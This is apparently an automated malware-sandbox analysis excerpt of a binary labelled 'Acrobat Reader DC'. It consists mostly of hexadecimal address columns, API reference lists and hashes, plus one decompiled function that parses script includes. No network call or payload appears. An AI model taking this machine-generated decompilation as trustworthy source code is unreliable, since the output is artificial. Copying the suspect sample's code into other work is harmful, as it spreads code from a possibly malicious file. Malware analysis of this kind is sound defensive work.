                                  0x0040a66a
                                  0x0040a66a
                                  0x00000000
                                  0x0040a66a
                                  0x0042a234
                                  0x0042a238
                                  0x00000000
                                  0x00000000
                                  0x00409dd0
                                  0x00409c2e
                                  0x00409c2e
                                  0x00409c35
                                  0x00409c39
                                  0x00429f4c
                                  0x00429f58
                                  0x00429f62
                                  0x00429f67
                                  0x00429f6a
                                  0x00429f6a
                                  0x00409c3f
                                  0x00409c44
                                  0x00409c49
                                  0x00409c4e
                                  0x00409c52
                                  0x00409c52
                                  0x00409c56
                                  0x00409c56
                                  0x00409c56
                                  0x00409c59
                                  0x00409c5b
                                  0x00409c5e
                                  0x00409c60
                                  0x00000000
                                  0x00000000
                                  0x00409c66
                                  0x00409c66
                                  0x00409c68
                                  0x00429f79
                                  0x00429f79
                                  0x00429f7b
                                  0x00409cb7
                                  0x00409cb9
                                  0x00409cbc
                                  0x00409cbe
                                  0x00429ffb
                                  0x0042a000
                                  0x0042a003
                                  0x0042a005
                                  0x0042a029
                                  0x0042a02f
                                  0x0042a032
                                  0x0042a037
                                  0x0042a03b
                                  0x00409c56
                                  0x00409c56
                                  0x00409c59
                                  0x00409c5b
                                  0x00409c5e
                                  0x00409c60
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409c60
                                  0x0042a00d
                                  0x0042a015
                                  0x0042a01a
                                  0x0042a01d
                                  0x0042a01f
                                  0x0042a023
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042a023
                                  0x00409cc4
                                  0x00409cc4
                                  0x00409cd2
                                  0x00409cde
                                  0x00409ce3
                                  0x00409ce9
                                  0x00409cee
                                  0x00409cf3
                                  0x00409cf6
                                  0x0042a04c
                                  0x0042a04e
                                  0x0042a050
                                  0x00000000
                                  0x00000000
                                  0x0042a05e
                                  0x00000000
                                  0x0042a05e
                                  0x00000000
                                  0x00409cf6
                                  0x00429f81
                                  0x00409c6e
                                  0x00409c70
                                  0x00429f9d
                                  0x00409ca9
                                  0x00409ca9
                                  0x00409cab
                                  0x00429fa7
                                  0x00429fa9
                                  0x00429fac
                                  0x00429fae
                                  0x00000000
                                  0x00000000
                                  0x00429fb6
                                  0x00429fbb
                                  0x00429fbe
                                  0x00429fc0
                                  0x00429fe4
                                  0x00429fea
                                  0x00429fed
                                  0x00429ff2
                                  0x00409c52
                                  0x00000000
                                  0x00409c52
                                  0x00429fc8
                                  0x00429fd0
                                  0x00429fd5
                                  0x00429fd8
                                  0x00429fda
                                  0x00429fde
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00429fde
                                  0x00409cb1
                                  0x0042a042
                                  0x00000000
                                  0x0042a042
                                  0x00000000
                                  0x00409cb1
                                  0x00409c76
                                  0x00409c78
                                  0x00429f8a
                                  0x00429f8a
                                  0x00409c7e
                                  0x00409c7e
                                  0x00409c80
                                  0x00409c82
                                  0x00409c84
                                  0x00409c87
                                  0x00409c8a
                                  0x00000000
                                  0x00000000
                                  0x00409c8c
                                  0x00409c8f
                                  0x00409c92
                                  0x00409c92
                                  0x00409c93
                                  0x00000000
                                  0x00409c95
                                  0x00429f86
                                  0x00000000
                                  0x00429f86
                                  0x00409c93
                                  0x00409c9a
                                  0x00409c9e
                                  0x00429f91
                                  0x00409ca4
                                  0x00409ca4
                                  0x00409ca4
                                  0x00409c9e
                                  0x00000000
                                  0x00429f71
                                  0x00429f71
                                  0x00429f73
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00429f73
                                  0x00409c56
                                  0x00409c52
                                  0x00429dfa
                                  0x00429dfc
                                  0x00429dfe
                                  0x00429e01
                                  0x00429e1c
                                  0x00429e1c
                                  0x00429e1d
                                  0x00429e1d
                                  0x00000000
                                  0x00429e1d
                                  0x00429e07
                                  0x00429e0a
                                  0x00000000
                                  0x00000000
                                  0x00429e10
                                  0x00429e18
                                  0x00000000
                                  0x00429e18
                                  0x004098e1
                                  0x004098e1
                                  0x004098e9
                                  0x004098f0
                                  0x004098f0
                                  0x004098f4
                                  0x00000000
                                  0x00000000
                                  0x00409905
                                  0x00409909
                                  0x0040990c
                                  0x0040990e
                                  0x00409910
                                  0x00409912
                                  0x00409916
                                  0x004298de
                                  0x004298e0
                                  0x004298e2
                                  0x004298e5
                                  0x004298f2
                                  0x004298f5
                                  0x00429c9d
                                  0x00429c9f
                                  0x0042ae80
                                  0x0042ae83
                                  0x00000000
                                  0x0042ae83
                                  0x004298fb
                                  0x00000000
                                  0x004298fb
                                  0x004298eb
                                  0x00429900
                                  0x00429900
                                  0x00429903
                                  0x00429907
                                  0x0042990a
                                  0x0042990a
                                  0x00429911
                                  0x00409922
                                  0x00409925
                                  0x0040992a
                                  0x0040992c
                                  0x0040992c
                                  0x0040992c
                                  0x0040992e
                                  0x00409932
                                  0x00409936
                                  0x00409938
                                  0x0040a689
                                  0x0040a68b
                                  0x0040a68e
                                  0x0040a690
                                  0x0040a690
                                  0x0040a697
                                  0x0040a6a9
                                  0x0040a6c0
                                  0x0040a6c4
                                  0x0040a6d0
                                  0x0040a6d1
                                  0x0040a6da
                                  0x0040a6dd
                                  0x0040a6dd
                                  0x0040993e
                                  0x00409940
                                  0x00409945
                                  0x00409948
                                  0x0040994a
                                  0x00429916
                                  0x00409950
                                  0x00409950
                                  0x00409950
                                  0x00409956
                                  0x00409959
                                  0x0040995a
                                  0x0040995e
                                  0x00409960
                                  0x00429923
                                  0x00429927
                                  0x0042992a
                                  0x0042992f
                                  0x00429cb9
                                  0x00429cba
                                  0x00429cbf
                                  0x00000000
                                  0x00429cbf
                                  0x00429941
                                  0x00429943
                                  0x00429948
                                  0x0042994a
                                  0x00429cd9
                                  0x00429cda
                                  0x00429cdc
                                  0x00000000
                                  0x00429cdc
                                  0x00429950
                                  0x00429958
                                  0x0042998a
                                  0x0042998a
                                  0x0042998e
                                  0x00429993
                                  0x00429997
                                  0x0042999b
                                  0x0042999f
                                  0x004299fb
                                  0x004299ff
                                  0x00429a0d
                                  0x00429a15
                                  0x00429a19
                                  0x00429a1e
                                  0x00000000
                                  0x00429a1e
                                  0x004299a5
                                  0x004299af
                                  0x004299b2
                                  0x004299b7
                                  0x00000000
                                  0x00000000
                                  0x004299cc
                                  0x004299d1
                                  0x004299d3
                                  0x00000000
                                  0x00000000
                                  0x004299dd
                                  0x004299e6
                                  0x004299ef
                                  0x004299f4
                                  0x00000000
                                  0x004299f4
                                  0x0042995e
                                  0x00429964
                                  0x00000000
                                  0x00000000
                                  0x0042997e
                                  0x0042997f
                                  0x00429984
                                  0x00000000
                                  0x00409966
                                  0x00409966
                                  0x0040996a
                                  0x0040996c
                                  0x00429a28
                                  0x00429a2d
                                  0x00429a2d
                                  0x00409972
                                  0x00409976
                                  0x00409979
                                  0x00429a3a
                                  0x00429a3e
                                  0x00429a40
                                  0x00429a47
                                  0x00429a51
                                  0x00429a52
                                  0x00429a57
                                  0x00429a57
                                  0x0040997f
                                  0x0040997f
                                  0x00409982
                                  0x00429a5f
                                  0x00429a63
                                  0x00429a65
                                  0x00429a6c
                                  0x00429a6c
                                  0x00409988
                                  0x00409988
                                  0x0040998b
                                  0x00429a7a
                                  0x00409991
                                  0x00409991
                                  0x00409994
                                  0x00429a8b
                                  0x00429a8c
                                  0x00429a98
                                  0x00429a99
                                  0x00429a9e
                                  0x0040999a
                                  0x0040999a
                                  0x0040999d
                                  0x00429aa6
                                  0x00429aaa
                                  0x00429aac
                                  0x00429ab3
                                  0x00429ab3
                                  0x00429aac
                                  0x0040999d
                                  0x00409994
                                  0x0040998b
                                  0x00409982
                                  0x004099a3
                                  0x004099a7
                                  0x004099ab
                                  0x004099b3
                                  0x004099bb
                                  0x004099bd
                                  0x0040a6e6
                                  0x0040a6e8
                                  0x0040a6eb
                                  0x0040a6ed
                                  0x0040a6ed
                                  0x0040a6f4
                                  0x0040a706
                                  0x0040a707
                                  0x0040a70c
                                  0x0040a710
                                  0x0040a71f
                                  0x0040a727
                                  0x0040a728
                                  0x0040a72d
                                  0x0040a730
                                  0x0040a730
                                  0x004099c3
                                  0x004099c7
                                  0x004099c9
                                  0x004099ce
                                  0x004099d1
                                  0x004099d3
                                  0x00429c8c
                                  0x004099fa
                                  0x004099fa
                                  0x00409a01
                                  0x00409a06
                                  0x00409a18
                                  0x00409a1d
                                  0x00409a1f
                                  0x0042ae89
                                  0x0042ae8d
                                  0x0042ae96
                                  0x0042ae9f
                                  0x0042aea4
                                  0x00000000
                                  0x00409a25
                                  0x00409a25
                                  0x00409a30
                                  0x00409a35
                                  0x00409a3a
                                  0x00409a3e
                                  0x00429c93
                                  0x00429c93
                                  0x00409a44
                                  0x00409a44
                                  0x00409a48
                                  0x00409a4a
                                  0x00000000
                                  0x00000000
                                  0x00409a4c
                                  0x00409a52
                                  0x00409a5a
                                  0x00409a5e
                                  0x00429ce2
                                  0x00429cec
                                  0x00429ced
                                  0x00000000
                                  0x00429ced
                                  0x00409a64
                                  0x00409a67
                                  0x00409a6b
                                  0x00000000
                                  0x00409a71
                                  0x00409a75
                                  0x00409a7b
                                  0x00409a82
                                  0x00409a85
                                  0x00409a89
                                  0x00409a8b
                                  0x00409a8b
                                  0x00409a8b
                                  0x00409a8b
                                  0x00409a93
                                  0x00409a94
                                  0x00409a98
                                  0x00409a9c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409a9c
                                  0x00409a6b
                                  0x00409a1f
                                  0x004099d9
                                  0x004099db
                                  0x004099df
                                  0x004099e2
                                  0x004099e9
                                  0x004099ec
                                  0x00429abd
                                  0x00429abe
                                  0x00429ac1
                                  0x00429b70
                                  0x00429b70
                                  0x00429b74
                                  0x004099f8
                                  0x004099f8
                                  0x00000000
                                  0x004099f8
                                  0x00429ac7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00429b0e
                                  0x00429b12
                                  0x00429b14
                                  0x00429b18
                                  0x00000000
                                  0x00000000
                                  0x00429b20
                                  0x00429b24
                                  0x00000000
                                  0x00000000
                                  0x00429ace
                                  0x00429ad0
                                  0x00429ad5
                                  0x00429ad8
                                  0x00429ada
                                  0x00429b06
                                  0x00429ae0
                                  0x00429ae0
                                  0x00429ae6
                                  0x00429aeb
                                  0x00429af1
                                  0x00429af4
                                  0x00429af7
                                  0x00429afa
                                  0x00429afc
                                  0x00429afc
                                  0x00000000
                                  0x00000000
                                  0x00429b36
                                  0x00429b3b
                                  0x00429b40
                                  0x00429b43
                                  0x00429b45
                                  0x00429b5d
                                  0x00429b5d
                                  0x00429b4b
                                  0x00429b4b
                                  0x00429b4f
                                  0x00429b54
                                  0x00429b56
                                  0x00429b56
                                  0x00429b56
                                  0x00429b56
                                  0x00429b56
                                  0x00429b5f
                                  0x00429b61
                                  0x00429b65
                                  0x00429b6b
                                  0x00429b6e
                                  0x00429b6e
                                  0x00429b6e
                                  0x00000000
                                  0x00000000
                                  0x00429b2b
                                  0x00429b2f
                                  0x00000000
                                  0x00000000
                                  0x00429b7d
                                  0x00429b82
                                  0x00000000
                                  0x00000000
                                  0x00429b84
                                  0x00429b86
                                  0x00429b8b
                                  0x00429b8e
                                  0x00429b8f
                                  0x00429b91
                                  0x00429b97
                                  0x00429b9b
                                  0x00429b9d
                                  0x00429b9e
                                  0x00429b9f
                                  0x00429ba5
                                  0x00429ba7
                                  0x00429bad
                                  0x00429baf
                                  0x00429bb0
                                  0x00429bb6
                                  0x00429bb8
                                  0x00429bb9
                                  0x00429bbe
                                  0x00429bc1
                                  0x00429bc1
                                  0x00000000
                                  0x00000000
                                  0x00429bd0
                                  0x00000000
                                  0x00000000
                                  0x00429bd7
                                  0x00429bd9
                                  0x00429bde
                                  0x00429be1
                                  0x00429be3
                                  0x00000000
                                  0x00000000
                                  0x00429be9
                                  0x00429bf4
                                  0x00000000
                                  0x00000000
                                  0x00429c04
                                  0x00429c06
                                  0x00429c0b
                                  0x00429c0d
                                  0x00429c11
                                  0x00429c13
                                  0x00429c15
                                  0x00429c17
                                  0x00429c19
                                  0x00429c1c
                                  0x00429c1e
                                  0x00429c50
                                  0x00429c52
                                  0x00429c57
                                  0x00429c59
                                  0x00429c5c
                                  0x00429c5e
                                  0x00429c61
                                  0x00429c64
                                  0x00429c24
                                  0x00429c24
                                  0x00429c25
                                  0x00429c2a
                                  0x00429c2c
                                  0x00429c2f
                                  0x00429c31
                                  0x00429c33
                                  0x00429c37
                                  0x00429c3a
                                  0x00429c3e
                                  0x00429c43
                                  0x00429c48
                                  0x00000000
                                  0x00000000
                                  0x00429c6c
                                  0x00429c6e
                                  0x00429c73
                                  0x00429c76
                                  0x00429c78
                                  0x00429bfb
                                  0x00429bfb
                                  0x00429bfd
                                  0x00000000
                                  0x00429bfd
                                  0x00429c7a
                                  0x00429c85
                                  0x00000000
                                  0x00000000
                                  0x00429ac7
                                  0x004099f2
                                  0x004099f6
                                  0x00000000
                                  0x004099f6
                                  0x00409960
                                  0x00000000
                                  0x004098f0
                                  0x004098db
                                  0x004098be
                                  0x004098c0
                                  0x00000000
                                  0x004098c6
                                  0x004098c9
                                  0x004098c9
                                  0x004098cf
                                  0x00000000
                                  0x004098cf
                                  0x004098c0
                                  0x00409878
                                  0x00409861
                                  0x0042985b
                                  0x0042985b
                                  0x0042985c
                                  0x00000000
                                  0x0042985c
                                  0x00429848
                                  0x00429860
                                  0x00429864
                                  0x00429864
                                  0x00000000
                                  0x0042981b
                                  0x0040976a
                                  0x00409772
                                  0x00409778
                                  0x00409780
                                  0x00409780
                                  0x00409787
                                  0x00000000
                                  0x00000000
                                  0x0040978f
                                  0x004097b9
                                  0x004097b9
                                  0x004097bd
                                  0x004097bf
                                  0x004097c5
                                  0x004097c6
                                  0x004097d2
                                  0x004097d3
                                  0x004097d8
                                  0x004097d8
                                  0x00000000
                                  0x00409791
                                  0x00409791
                                  0x00409795
                                  0x00000000
                                  0x004097a0
                                  0x004097a6
                                  0x0040a671
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004097ac
                                  0x004097ac
                                  0x004097af
                                  0x004097b2
                                  0x004097b3
                                  0x00000000
                                  0x004097b5
                                  0x004097b5
                                  0x00000000
                                  0x004097b5
                                  0x004097b3
                                  0x0040a675
                                  0x0040a675
                                  0x0040a678
                                  0x0040a67c
                                  0x0040a67c
                                  0x00409780
                                  0x00000000
                                  0x00409772

                                  APIs
                                  • _wcslen.LIBCMT ref: 004096C1
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 0040970C
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                  • _memmove.LIBCMT ref: 00409D96
                                  • _memmove.LIBCMT ref: 0040A6C4
                                  • _memmove.LIBCMT ref: 004297E5
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                  • String ID:
                                  • API String ID: 2383988440-0
                                  • Opcode ID: a639c434517bd2e0037d18529c0e2033c2f3a75bfd55056ecc2ab01d8741cfb2
                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                  • Opcode Fuzzy Hash: a639c434517bd2e0037d18529c0e2033c2f3a75bfd55056ecc2ab01d8741cfb2
                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E004033C0(void* __edx, void* __fp0, char _a1, char _a2, signed int _a3, void* _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, char _a48, intOrPtr _a52, signed char _a68, intOrPtr _a72, char _a84, WCHAR* _a92, short _a96, short _a624, char _a1152, short _a1672, char _a2200, char _a10392, char _a10912) {
				char _v0;
				char _v19;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed int _t147;
				void* _t151;
				signed char _t180;
				char _t182;
				intOrPtr _t183;
				void* _t191;
				void* _t197;
				signed int _t198;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t207;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				char* _t215;
				intOrPtr* _t216;
				signed int _t225;
				intOrPtr _t226;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t282;
				intOrPtr* _t284;
				signed int _t285;
				signed int _t286;
				void* _t288;
				void* _t290;
				void* _t291;

				_t322 = __fp0;
				_t286 = _t285 & 0xfffffff8;
				E00422240(0x2cac);
				_t146 =  *0x4a9538; // 0x0
				_t147 = _t146 + 1;
				 *0x4a9538 = _t147;
				_t294 = _t147 - 0x30;
				if(_t147 >= 0x30) {
					E00454014(__eflags, __fp0, _a4, _a16, _a24, L"#include depth exceeded.  Make sure there are no recursive includes", _a20);
					 *0x4a9538 =  *0x4a9538 - 1;
					_t151 = 0;
					L42:
					return _t151;
				}
				_t270 = _a8;
				_t225 = 1;
				_a4 = 0;
				_a1 = 1;
				_a3 = 1;
				_a2 = 0;
				E0040DA60( &_a24, _t294);
				E00401B10(_t270,  &_a8, _t294);
				if(E0040DE40(0x2000,  &_a24, _t270,  &_a8) == 0) {
					_v0 = 1;
				} else {
					_v0 = 0;
				}
				E00402250( &_a8);
				if(_v0 != 0) {
					E00454014(__eflags, _t322, _a4, _a16, _a24, L"Error opening the file", _a20);
					E00443FDF( &_a4);
					 *0x4a9538 =  *0x4a9538 - 1;
					_t151 = 0;
					goto L42;
				} else {
					GetCurrentDirectoryW(0x104,  &_a1672);
					GetFullPathNameW(_t270, 0x104,  &_a96,  &_a92);
					E00413A0E( &_a96,  &_a84,  &_a1152,  &_a10912,  &_a10392);
					E00411567( &_a624,  &_a84);
					E00411536( &_a624,  &_a1152);
					_t288 = _t286 + 0x24;
					_t237 =  &_a624;
					SetCurrentDirectoryW( &_a624);
					while(_t225 == 1) {
						_a2200 = 0;
						E00403350( &_a48);
						_t180 = _a68;
						if((_t180 & 0x00000003) != 0) {
							_t182 = E0045F6BB(_t237, __eflags, _t322,  &_a24,  &_a48);
							_t226 = 0;
						} else {
							_t299 = _t180 & 0x00000004;
							if((_t180 & 0x00000004) != 0) {
								_t182 = E00468961( &_a24, __eflags, _t322,  &_a24,  &_a48);
								_t226 = 0;
							} else {
								_t226 = 0;
								_push(0x10);
								_a12 = 0;
								_a16 = 0x10;
								_t215 = E004115D7(_t270,  &_a48, _t299);
								_push(4);
								_a8 = _t215;
								 *_t215 = 0;
								_t216 = E004115D7(_t270,  &_a48, _t299);
								_t288 = _t288 + 8;
								if(_t216 == 0) {
									_a20 = 0;
								} else {
									 *_t216 = 1;
									_a20 = _t216;
								}
								if(E004037A0( &_a24,  &_a8, _t322) == 0) {
									E00401350( &_a8);
									_t182 = 0;
								} else {
									E00403AF0(_t226,  &_a8,  &_a48);
									_t284 = _a12;
									 *_t284 =  *_t284 - 1;
									if( *_t284 == 0) {
										_t237 = _a8;
										_push(_a8);
										E004111DC();
										_push(_t284);
										E004111DC();
										_t288 = _t288 + 8;
									}
									_t182 = 1;
								}
							}
						}
						if(_t182 == 0) {
							L41:
							E0040DA20( &_a24);
							_a68 = _t226;
							_a72 = _t226;
							SetCurrentDirectoryW( &_a1672);
							E0040DA20( &_a24);
							_a68 = _t226;
							_a72 = _t226;
							E00402250( &_a48);
							E0040DA20( &_a24);
							_push(_a28);
							E004111DC();
							_t151 = _a1;
							 *0x4a9538 =  *0x4a9538 - 1;
							__eflags =  *0x4a9538;
							goto L42;
						} else {
							_t183 = _a52;
							if(_t183 > 0xffe) {
								_t277 = _t183 - 0xffe;
								E004026F0( &_a48);
								E00410E60(_a48 + 0x1ffc, _a48 + 0x1ffc + _t277 * 2, _a52 - _t277 + _a52 - _t277 - 0x1ffa);
								_t288 = _t288 + 0xc;
								_a52 = _a52 - _t277;
							}
							E00411567( &_a2200, _a48);
							_a4 = _a4 + 1;
							_t290 = _t288 + 8;
							_t278 = 0;
							_t270 = 0;
							while(1) {
								_t227 =  *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff;
								_t191 = E0041324E( *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff);
								_t288 = _t290 + 4;
								if(_t191 == 0) {
									break;
								}
								_t213 = E00413225(_t237, _t227);
								_t290 = _t288 + 4;
								if(_t213 != 0) {
									_t278 = _t278 + 1;
									continue;
								}
								break;
							}
							if( *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2)) == _t270) {
								L21:
								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) = 0;
								if(E004039A0( &_a2200) == 0) {
									E00454014(__eflags, _t322, _a4, _a16, _a4, L"Unterminated string",  &_a2200);
									_v19 = 0;
									break;
								}
								_t197 = E004111C1( &_a2200);
								_t291 = _t288 + 4;
								if(_t197 == 0) {
									L28:
									_v0 = 0;
									_t198 = E004111C1( &_a2200);
									_t288 = _t291 + 4;
									if(_t198 > 2) {
										_t280 = _t198;
										_t210 = E00413225( *(_t288 + 0x8a4 + _t280 * 2) & 0x7f,  *(_t288 + 0x8a4 + _t280 * 2) & 0x7f);
										_t288 = _t288 + 4;
										if(_t210 != 0) {
											__eflags =  *((short*)(_t288 + 0x8a6 + _t280 * 2)) - 0x5f;
											if( *((short*)(_t288 + 0x8a6 + _t280 * 2)) == 0x5f) {
												 *((short*)(_t288 + 0x8a6 + _t280 * 2)) = 0;
												_v0 = 1;
											}
										}
									}
									if(_a2 == 1) {
										_t237 = _a4;
										E00434963(_a4,  &_a2200);
									} else {
										_t279 = _a4;
										_t237 = _a4;
										_t202 = E00403A20(_a4,  &_a2200, _t322,  &_a2200,  &_a96,  &_a4,  &_a24);
										if(_t202 != 3) {
											_t203 = _t202;
											__eflags = _t203;
											if(_t203 == 0) {
												_a1 = 0;
												L33:
												if(_v0 == 1) {
													_a2 = 1;
												} else {
													_a2 = 0;
												}
												if(_a1 != 1) {
													break;
												} else {
													_t225 = _a3;
													continue;
												}
											}
											_t204 = _t203 - 2;
											__eflags = _t204;
											if(_t204 == 0) {
												goto L32;
											}
											_t207 = _t204 - 2;
											__eflags = _t207;
											if(_t207 == 0) {
												_a3 = _t207;
											}
											goto L33;
										}
										L32:
										_t237 = _a4;
										E00403A50( &_a2200, _a4, _t279, _a4, _a12);
									}
									goto L33;
								}
								_t66 = _t197 - 1; // -1
								_t282 = _t66;
								if(_t282 < 0) {
									L27:
									 *((short*)(_t291 + 0x8aa + _t282 * 2)) = 0;
									goto L28;
								}
								while(1) {
									_t270 =  *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff;
									_t211 = E0041324E( *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff);
									_t291 = _t291 + 4;
									if(_t211 == 0) {
										goto L27;
									}
									_t212 = E00413225(_t237, _t270);
									_t291 = _t291 + 4;
									if(_t212 != 0) {
										_t282 = _t282 - 1;
										__eflags = _t282;
										if(_t282 >= 0) {
											continue;
										}
									}
									goto L27;
								}
								goto L27;
							} else {
								goto L20;
							}
							do {
								L20:
								_t237 =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
								_t278 = _t278 + 1;
								_t270 =  &(_t270[0]);
							} while ( *((short*)(_t288 + 0x8a8 + _t278 * 2)) != 0);
							goto L21;
						}
					}
					_t226 = 0;
					goto L41;
				}
			}







































                                  0x004033c0
                                  0x004033c3
                                  0x004033cb
                                  0x004033d0
                                  0x004033d6
                                  0x004033d9
                                  0x004033de
                                  0x004033e1
                                  0x00428208
                                  0x0042820d
                                  0x00428213
                                  0x0040378d
                                  0x00403793
                                  0x00403793
                                  0x004033e7
                                  0x004033ea
                                  0x004033f0
                                  0x004033f8
                                  0x004033fd
                                  0x00403401
                                  0x00403406
                                  0x0040340f
                                  0x00403425
                                  0x0042821a
                                  0x0040342b
                                  0x0040342b
                                  0x0040342b
                                  0x00403434
                                  0x0040343e
                                  0x00428239
                                  0x00428243
                                  0x00428248
                                  0x0042824e
                                  0x00000000
                                  0x00403444
                                  0x00403451
                                  0x00403467
                                  0x00403492
                                  0x004034a7
                                  0x004034bc
                                  0x004034c1
                                  0x004034c4
                                  0x004034cc
                                  0x004034d2
                                  0x004034e1
                                  0x004034e9
                                  0x004034ee
                                  0x004034f4
                                  0x0042827e
                                  0x00428283
                                  0x004034fa
                                  0x004034fa
                                  0x004034fc
                                  0x0042825f
                                  0x00428264
                                  0x00403502
                                  0x00403502
                                  0x00403504
                                  0x00403506
                                  0x0040350a
                                  0x00403512
                                  0x0040351a
                                  0x0040351c
                                  0x00403520
                                  0x00403522
                                  0x00403527
                                  0x0040352c
                                  0x0042826b
                                  0x00403532
                                  0x00403532
                                  0x00403538
                                  0x00403538
                                  0x0040354b
                                  0x00403730
                                  0x00403735
                                  0x00403551
                                  0x00403557
                                  0x0040355c
                                  0x00403560
                                  0x00403562
                                  0x00403564
                                  0x00403568
                                  0x00403569
                                  0x00403571
                                  0x00403572
                                  0x00403577
                                  0x00403577
                                  0x0040357a
                                  0x0040357a
                                  0x0040354b
                                  0x004034fc
                                  0x0040357e
                                  0x0040373c
                                  0x00403740
                                  0x0040374d
                                  0x00403751
                                  0x00403755
                                  0x0040375b
                                  0x00403764
                                  0x00403768
                                  0x0040376c
                                  0x00403771
                                  0x0040377a
                                  0x0040377b
                                  0x00403780
                                  0x00403787
                                  0x00403787
                                  0x00000000
                                  0x00403584
                                  0x00403584
                                  0x0040358d
                                  0x0042828a
                                  0x00428294
                                  0x004282b9
                                  0x004282be
                                  0x004282c1
                                  0x004282c1
                                  0x004035a0
                                  0x004035a5
                                  0x004035a9
                                  0x004035ac
                                  0x004035ae
                                  0x004035b0
                                  0x004035b0
                                  0x004035b9
                                  0x004035be
                                  0x004035c3
                                  0x00000000
                                  0x00000000
                                  0x004035c6
                                  0x004035cb
                                  0x004035d0
                                  0x00403716
                                  0x00000000
                                  0x00403716
                                  0x00000000
                                  0x004035d0
                                  0x004035de
                                  0x004035fd
                                  0x00403606
                                  0x00403615
                                  0x00428350
                                  0x00428355
                                  0x00000000
                                  0x00428355
                                  0x00403623
                                  0x00403628
                                  0x0040362d
                                  0x00403670
                                  0x00403678
                                  0x0040367d
                                  0x00403682
                                  0x00403688
                                  0x0040368a
                                  0x0040369c
                                  0x004036a1
                                  0x004036a6
                                  0x0040371c
                                  0x00403725
                                  0x004282df
                                  0x004282e2
                                  0x004282e2
                                  0x00403725
                                  0x004036a6
                                  0x004036ad
                                  0x004282ec
                                  0x004282f8
                                  0x004036b3
                                  0x004036b3
                                  0x004036cd
                                  0x004036cf
                                  0x004036d7
                                  0x00428302
                                  0x00428302
                                  0x00428305
                                  0x00428322
                                  0x004036f2
                                  0x004036f7
                                  0x0042832c
                                  0x004036fd
                                  0x004036fd
                                  0x004036fd
                                  0x00403707
                                  0x00000000
                                  0x0040370d
                                  0x0040370d
                                  0x00000000
                                  0x0040370d
                                  0x00403707
                                  0x00428307
                                  0x00428307
                                  0x0042830a
                                  0x00000000
                                  0x00000000
                                  0x00428310
                                  0x00428310
                                  0x00428313
                                  0x00428319
                                  0x00428319
                                  0x00000000
                                  0x00428313
                                  0x004036dd
                                  0x004036e0
                                  0x004036ed
                                  0x004036ed
                                  0x00000000
                                  0x004036ad
                                  0x0040362f
                                  0x0040362f
                                  0x00403634
                                  0x00403666
                                  0x00403668
                                  0x00000000
                                  0x00403668
                                  0x00403640
                                  0x00403640
                                  0x00403649
                                  0x0040364e
                                  0x00403653
                                  0x00000000
                                  0x00000000
                                  0x00403656
                                  0x0040365b
                                  0x00403660
                                  0x004282ca
                                  0x004282ca
                                  0x004282cb
                                  0x00000000
                                  0x00000000
                                  0x004282d1
                                  0x00000000
                                  0x00403660
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004035e0
                                  0x004035e0
                                  0x004035e0
                                  0x004035e8
                                  0x004035f0
                                  0x004035f1
                                  0x004035f2
                                  0x00000000
                                  0x004035e0
                                  0x0040357e
                                  0x0042835a
                                  0x00000000
                                  0x0042835a

                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
